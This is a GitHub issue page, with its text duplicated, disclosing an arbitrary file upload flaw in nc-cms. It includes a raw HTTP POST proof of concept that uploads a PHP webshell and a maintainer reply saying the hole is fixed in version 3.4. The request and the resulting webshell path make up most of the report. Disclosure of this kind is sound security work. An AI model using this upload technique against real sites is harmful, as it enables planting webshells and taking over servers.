Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hello, I found that this cms may have some security problem you can edit your html on http://localhost/nc-cms/index.php?action=edit_html&name=home_content and you can upload any evil file js you want 1.click "upfile or image" 2.select a php file (eg: a evil webshell)
POC: POST /nc-cms/index.php?action=file_manager_upload HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/nc-cms/index.php?action=file_manager Cookie: tinymcePasteText=1; phpspypass=yccc; loginpass=f4f068e71e0d87bf0ad51e6214ab84e9; hadlog=%2Fnc-cms%2Fcontent%2Fupload%2F2014phpspy.php; PHPSESSID=dlgu3f22v6eep44leeuve5lud4 Connection: close Content-Type: multipart/form-data; boundary=---------------------------32226254718020 Content-Length: 34678
-----------------------------32226254718020 Content-Disposition: form-data; name="file"; filename="phpspy2010.php" Content-Type: application/octet-stream
-----------------------------32226254718020--
upload success!
the path: /nc-cms/system/../content/upload/phpspy2010.php webshell :http://localhost/nc-cms/content/upload/phpspy2010.php
login webshell
The text was updated successfully, but these errors were encountered:
Resolved as a low priority fix in version 3.4.
Low priority because the User would have to have admin credentials to do this, however I've gone ahead and pro-actively restricted the upload of PHP files since we shouldn't be uploading production scripts to this directory anyway.
Sorry, something went wrong.
No branches or pull requests
Hello, I found that this cms may have some security problem


you can edit your html on
http://localhost/nc-cms/index.php?action=edit_html&name=home_content
and you can upload any evil file js you want
1.click "upfile or image"
2.select a php file (eg: a evil webshell)
POC:
POST /nc-cms/index.php?action=file_manager_upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/nc-cms/index.php?action=file_manager
Cookie: tinymcePasteText=1; phpspypass=yccc; loginpass=f4f068e71e0d87bf0ad51e6214ab84e9; hadlog=%2Fnc-cms%2Fcontent%2Fupload%2F2014phpspy.php; PHPSESSID=dlgu3f22v6eep44leeuve5lud4
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------32226254718020
Content-Length: 34678
-----------------------------32226254718020
Content-Disposition: form-data; name="file"; filename="phpspy2010.php"
Content-Type: application/octet-stream
-----------------------------32226254718020--
upload success!

the path: /nc-cms/system/../content/upload/phpspy2010.php
webshell :http://localhost/nc-cms/content/upload/phpspy2010.php
login webshell
The text was updated successfully, but these errors were encountered: